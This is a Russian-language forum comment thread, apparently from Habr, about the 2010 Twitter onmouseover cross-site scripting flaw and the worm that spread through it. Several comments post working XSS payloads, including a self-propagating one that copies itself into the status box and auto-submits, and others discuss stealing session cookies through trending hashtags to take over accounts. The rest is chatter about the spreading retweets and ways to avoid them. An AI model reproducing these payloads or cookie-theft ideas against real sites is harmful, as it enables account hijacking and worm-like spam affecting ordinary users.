Как стать автором
Поиск
Написать публикацию
Обновить

Комментарии 105

Молодец!

Фильтруйте все данные приходящие от пользователя!!!
Всего голосов 2: ↑2 и ↓0+2
В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
Всего голосов 1: ↑1 и ↓0+1
Мне вот такую штуку послали (пробел после http надо убрать):

http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
Комментарий пока не оценивали0
Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

Кстати, так можно спастить от бага до офф. фикса
Всего голосов 1: ↑1 и ↓0+1
Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
Всего голосов 5: ↑4 и ↓1+3
А у кого?
Всего голосов 1: ↑1 и ↓0+1
У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
Всего голосов 2: ↑2 и ↓0+2
А как ты его включаешь? Через настройки?
Комментарий пока не оценивали0
А как вообще узнать, есть у меня эта возможность, или нет?
Всего голосов 2: ↑1 и ↓10
Сверху появится вот такая кнопочка:
Всего голосов 9: ↑8 и ↓1+7
Может, если подделать кнопочку у себя, она и у других включится?
Всего голосов 1: ↑1 и ↓0+1
Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
Попробуйте, вдруг получится.
Всего голосов 2: ↑1 и ↓10
Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
Комментарий пока не оценивали0
А у меня сработало и включилось. Спасибо!
Предложения как на скриншоте выше у меня не было.
Всего голосов 2: ↑1 и ↓10
Кстати, у меня это предложение блокировал один из плагинов)
Всего голосов 2: ↑2 и ↓0+2
Понятно, спасибо!
Комментарий пока не оценивали0
хреноватенькие тестеры у них
Всего голосов 7: ↑7 и ↓0+7
Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
Комментарий пока не оценивали0
А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
Всего голосов 1: ↑1 и ↓0+1
сморя че в них хранится
Всего голосов 1: ↑0 и ↓1-1
Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
Комментарий пока не оценивали0
некоторые сайты используют для авторизации твиттеровский OAuth
Всего голосов 3: ↑3 и ↓0+3
Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
Комментарий пока не оценивали0
Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
Комментарий пока не оценивали0
Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
Всего голосов 2: ↑2 и ↓0+2
А теперь то же самое с хеш-тегом, например #prinsjesdag
Всего голосов 1: ↑1 и ↓0+1
с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
Можете попробовать, если че:
twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
Комментарий пока не оценивали0
Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
Всего голосов 4: ↑2 и ↓20

Переходим на CSS3 ;-)
Всего голосов 12: ↑12 и ↓0+12
Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
Всего голосов 17: ↑17 и ↓0+17
меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
Всего голосов 1: ↑1 и ↓0+1
возвращаемся к временам ASM, приложение в минимальном количестве символов )
Комментарий пока не оценивали0
Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
Комментарий пока не оценивали0
символов и так мало ))
Всего голосов 2: ↑2 и ↓0+2
Noscript как бе говорит «пофигу» ))
Комментарий пока не оценивали0
НЛО прилетело и опубликовало эту надпись здесь
всё, черви пошли. не ходите на вебморду
Всего голосов 2: ↑2 и ↓0+2
Twi-вирус:
http: //a.no/@"onmouseover=";$('textarea:first').val
(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
Всего голосов 6: ↑6 и ↓0+6
Аха, уже вся лента забита. Прикольно.
Комментарий пока не оценивали0
А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
Комментарий пока не оценивали0
хм…
Комментарий пока не оценивали0
просто в таком случае можно-же будет вешать события не на mouseover, а, скажем на mousemove и так далее
Комментарий пока не оценивали0
ссылка выше на twitter.com/superbacker у него есть такие попытки, наводить проверять не стал )))
Комментарий пока не оценивали0
Ха, работает… бугагашенька…
Комментарий пока не оценивали0
Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
Всего голосов 1: ↑1 и ↓0+1
ну когда еще такое будет… ща наиграются все и надоест )
Комментарий пока не оценивали0
это же старая дырка… там клиент не фильтровался вроде.
Всего голосов 1: ↑1 и ↓0+1
Это старая уязвимость.
Комментарий пока не оценивали0
НЛО прилетело и опубликовало эту надпись здесь
это не акк балуется, а твивирус распространется.
Всего голосов 1: ↑0 и ↓1-1
НЛО прилетело и опубликовало эту надпись здесь
А какой командой удаляются аккаунты? :)
Всего голосов 1: ↑0 и ↓1-1
Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
Всего голосов 2: ↑1 и ↓10
Что там было?)
Комментарий пока не оценивали0
В ленте пипец просто настал.
Спас Firebug…
Всего голосов 1: ↑1 и ↓0+1
Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
Всего голосов 11: ↑3 и ↓8-5
крупная компания грешит ламерством
Всего голосов 6: ↑6 и ↓0+6
Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
Всего голосов 4: ↑1 и ↓3-2
Дуров, кто-же еще =)
Комментарий пока не оценивали0
Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
Всего голосов 11: ↑10 и ↓1+9
так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
Всего голосов 3: ↑3 и ↓0+3
Хотите сказать, что Вконтакте преднамеренно это сделала?
Комментарий пока не оценивали0
За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
Всего голосов 1: ↑0 и ↓1-1
Попался два раза на авторетвите. Firebug помог.
А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
Комментарий пока не оценивали0
«В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
Твиттер без скрипта не работает.
Комментарий пока не оценивали0
В целях безопасности сейчас лучше всего использовать внешние клиенты.
Комментарий пока не оценивали0
Вся лента теперь в этих отправлениях.
Комментарий пока не оценивали0
НЛО прилетело и опубликовало эту надпись здесь
новая твиттер версия упячка
Всего голосов 5: ↑5 и ↓0+5
Всё, уже вылечили.

Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
http:\u002f\u002fis.gd\u002ffl9A7
Комментарий пока не оценивали0
старые посты продолжают действовать
Комментарий пока не оценивали0
<script language="javascript">
	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
</script>
Комментарий пока не оценивали0
сорри, это был ответ на сообщение EvgeniyLazarev
Всего голосов 1: ↑1 и ↓0+1
Что оно делает?
Комментарий пока не оценивали0
уже достало
Всего голосов 4: ↑4 и ↓0+4
Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
Всего голосов 3: ↑3 и ↓0+3
Ну вот и пофиксили
Комментарий пока не оценивали0
Ждём, когда @KremlinRussia ретвитнет радугу :)
Всего голосов 5: ↑5 и ↓0+5
или @KermlinRussia :)
Комментарий пока не оценивали0
НЛО прилетело и опубликовало эту надпись здесь
Почему до сих пор нет Властелина?
Всего голосов 6: ↑6 и ↓0+6
@ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
Всего голосов 2: ↑1 и ↓10
НЛО прилетело и опубликовало эту надпись здесь
НЛО прилетело и опубликовало эту надпись здесь
Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
Комментарий пока не оценивали0
Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
Всего голосов 1: ↑1 и ↓0+1
У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
Комментарий пока не оценивали0
Вот, это и я зацепил.
Комментарий пока не оценивали0
НЛО прилетело и опубликовало эту надпись здесь
Я горжусь, что меня фолловит @mr_the :D
Всего голосов 3: ↑2 и ↓1+1
Пофиксили. Расходимся (:
Всего голосов 2: ↑2 и ↓0+2
кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
Всего голосов 7: ↑0 и ↓7-7
А у меня после всех этих забав, главная твиттера выглядит вот так,
Всего голосов 1: ↑1 и ↓0+1
Зарегистрируйтесь на Хабре, чтобы оставить комментарий

Публикации

Показать лучшие за всё время

Истории

Ваш аккаунт

Разделы

Информация

Услуги

Техническая поддержка
© 2006–2024, Habr